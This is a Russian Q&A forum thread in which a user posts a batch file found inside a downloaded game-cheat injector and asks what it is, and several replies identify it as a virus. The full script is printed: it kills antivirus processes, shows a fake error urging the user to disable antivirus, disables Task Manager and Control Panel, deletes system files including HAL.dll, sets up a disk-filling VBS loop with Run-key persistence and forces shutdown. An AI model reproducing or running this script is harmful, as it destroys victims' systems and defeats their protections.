Top.Mail.Ru
Ответы

Ребят что это такое???

Открыл инжектор чита с помощью архива и там был файл bat открываю bat с помощью блокнота а там это

@echo off
taskkill.exe /F /IM avesvc.exe /T
taskkill.exe /F /IM ashdisp.exe /T
taskkill.exe /F /IM avgcc.exe /T
echo 0000000000000000000000000000
echo I'm starting to inject
timeout 4 /nobreak
echo 0x930
echo ERROR when injecting {file .dll was not found} please turn off your antivirus and check the status of the .dll file
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDesktop /t REG_DWORD /d 1 /f >nul
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\RestrictRun /v 1 /t REG_DWORD /d %SystemRoot%\explorer.exe /f >nul
del "%SystemRoot%\Media" /q >nul
reg add HKCU\Software\Microsoft\Windows\Current Version\Policies\Explorer/v NoControlPanel /t REG_DWORD /d 1 /f >nul
reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem /v DisableTaskMgr /t REG_DWORD /d 1 /f >nul
%SystemRoot%/system32/rundll32 user32, SwapMouseButton >nul
del "%SystemRoot%Cursors*.*" >nul
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
del c:Program Files/q
del "%SystemRoot%Driver Cachei386driver.cab" /f /q >nul
del %0
assoc .lnk=.de
rundll32 user,SwapMouseButton
echo Set fso = CreateObject("Scripting.FileSystemObject") > %systemdrive%\windows\system32\rundll32.vbs
echo do >> %systemdrive%\windows\system32\rundll32.vbs
echo Set tx = fso.CreateTextFile("%systemdrive%\windows\system32\rundll32.dat", True) >> %systemdrive%\windows\system32\rundll32.vbs
echo tx.WriteBlankLines(100000000) >> %systemdrive%\windows\system32\rundll32.vbs
echo tx.close >> %systemdrive%\windows\system32\rundll32.vbs
echo FSO.DeleteFile "%systemdrive%\windows\system32\rundll32.dat" >> %systemdrive%\windows\system32\rundll32.vbs
echo loop >> %systemdrive%\windows\system32\rundll32.vbs
start %systemdrive%\windows\system32\rundll32.vbs
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v system_host_run /t REG_SZ /d %systemdrive%\windows\system32\rundll32.vbs /f
copy ""%0"" "%SystemRoot%\system32\injector.exe"
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Filel" /t REG_SZ /d "%SystemRoot%\system32\injector.exe" /f
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoControlPanel /t REG_DWORD /d 1 /f
Echo 999999999999999999999999999999999999999999
Date 1.01.1986
If exist c:injector.exe goto abc
Copy %0 c:injector.exe
Attrib +h c:injector.exe
Echo c:ski.bat >>autoexec.bat
:abc
md PRIDUROK
md LUZER
md DURAK
md LAMER
Label E: PRIDUROK
assoc .exe=.de
del c:Program Files/q
rundll32 user,disableoemlayer
echo 00000000000000
del %systemroot%\system32\HAL.dll
shutdown -s -t 1 -c "virus extrimde.dll" >nul

Только авторизированные пользователи могут оставлять свои ответы
Дата
Популярность
Аватар пользователя
Новичок

Это командный блок запуска вируса, отключения антивирусов....

Аватар пользователя
Просветленный

ну судя по коду он отключает диспетчер задач, рабочий стол, меняет кнопки местами, удаляет курсоры, сносит Program Files и пишет в итоге всякие гадости

Аватар пользователя
Ученик

это вирус удали его лучше он сносит всю винду нахрен

Аватар пользователя
Ученик

промой компьютер с мылом, этот файл сносит драйвера, отключает все важные функции короче сносит всю винду, удали и запиши сайт с которого скачал файл в черный список чтобы его избегать

Аватар пользователя
Просветленный

читай внимательно))) чит-бот тебе пишет:
md PRIDUROK
md LUZER
md DURAK
md LAMER
Label E: PRIDUROK